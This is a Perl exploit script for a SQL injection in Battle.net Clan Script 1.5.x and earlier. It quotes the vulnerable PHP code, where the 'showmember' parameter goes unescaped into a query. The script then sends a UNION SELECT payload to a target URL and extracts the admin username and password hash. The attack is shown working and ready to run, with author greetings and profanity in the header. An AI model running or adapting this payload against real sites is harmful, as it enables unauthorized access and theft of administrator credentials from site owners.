#!/usr/bin/perl -w
# download script : http://sourceforge.net/project/showfiles.php?group_id=142506&package_id=156487
##############################################################
# Battle.net Clan Script <= 1.5.x - Remote SQL Inj Exploit #
##############################################################
########################################
#[*] Founded by : Stack-Terrorist [v40]
#[*] Contact: Ev!L
#[*] Greetz : Houssamix & All muslims HaCkeRs :)
#[*] Fuck : JosS :@
########################################
# vulnerable page
########################################
#
#
# #div>
#
#
#
Members
#
#
# Rank |
# Member Name |
# Email |
# Date Joined |
#
# ' . "\n"; }
## else { echo '' . "\n"; }
# echo '' . $rank . ' | ' . "\n";
# echo '' . $name . ' | ' . "\n";
## if($email === '') { echo 'n/a | ' . "\n"; }
# else { echo 'Email | ' . "\n"; }
# echo '' . date("F d, Y", strtotime($date)) . ' | ' . "\n";
# echo '
' . "\n";
# $alt = $alt + 1;
#}
#?>
#
#
#
Member Details
#
#
# Rank |
# Member Name |
# Email |
# Date Joined |
#
#
# ' . $r["rank"] . '' . "\n";
# echo '' . $r["name"] . ' | ' . "\n";
# if($r["email"] === '') { echo 'n/a | ' . "\n"; }
# else { echo 'Email | ' . "\n"; }
# echo '' . date("F d, Y", strtotime($r["date"])) . ' | ' . "\n";
# ?>
#
#
#
#
Medals
#
#
# Medal |
# Medal Name |
# Description |
#
#
# ' . "\n"; }
# else { echo '
' . "\n"; }
# echo ' | ' . "\n";
# echo "" . $name . " | \n";
# echo "" . $desc . " | \n";
# echo "
\n";
# $alt = $alt + 1;
#}?>
#
#
# \n";
# echo "
Recruited
\n";
# $result = mysql_query("SELECT bcs_members.name FROM bcs_members, (SELECT id FROM bcs_members WHERE name = '" . $_GET['showmember'] . "') AS results "
# . "WHERE results.id = bcs_members.recruit") or die(mysql_error());
# while($r=mysql_fetch_array($result))
# {
# echo $r["name"] . "
\n";
# }
# }
# ?>
#
#*/
#----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------#
system("color a");
print "\t\t############################################################\n\n";
print "\t\t# Battle.net Clan Script <= 1.5.x - Remote SQL Inj Exploit #\n\n";
print "\t\t# by Stack-Terrorist [v40] #\n\n";
print "\t\t############################################################\n\n";
use LWP::UserAgent;
die "Example: perl $0 http://victim.com/\n" unless @ARGV;
system("color f");
#the username of joomla
$user="name";
#the pasword of joomla
$pass="password";
#the tables of joomla
$tab="bcs_members";
$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
$host = $ARGV[0] . "/?page=members&showmember=-1'%20union%20select%20".$pass.",user(),44,".$user."+from+".$tab."+where+id=1/*";
$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->content;
if ($answer =~ /
(.*?)<\/td>/){
print "\nBrought to you by v4-team.com...\n";
print "\n[+] Admin User : $1";
}
if ($answer =~/([0-9a-fA-F]{32})/){print "\n[+] Admin Hash : $1\n\n";
print "\t\t# Exploit has ben aported user and password hash #\n\n";}
else{print "\n[-] Exploit Failed...\n";}
# exploit exploited by Stack-Terrorist
|